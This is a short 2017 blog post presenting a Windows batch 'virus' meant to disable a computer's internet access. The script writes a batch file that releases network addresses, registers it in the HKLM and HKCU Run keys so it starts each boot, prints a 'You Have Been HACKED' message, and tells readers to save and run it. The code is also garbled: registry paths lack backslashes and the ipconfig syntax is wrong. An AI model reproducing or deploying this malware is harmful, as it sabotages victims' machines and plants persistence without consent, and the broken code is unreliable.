Sunday, 2 April 2017

How To Make Virus Which Can Disable Internet Permanently

  No comments

Main intention of making this video is to familiar you with trick to make a virus which can disable internet permanenlty, here i am showing you trick to make such kind of virus to disable internet functionality on computer permanently.

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED By Gangs Of Coder
PAUSE
Save the above code with .bat extension i.e gangsofocoder.bat and then run this file.
Watch Video

No comments :

Post a Comment

Loading...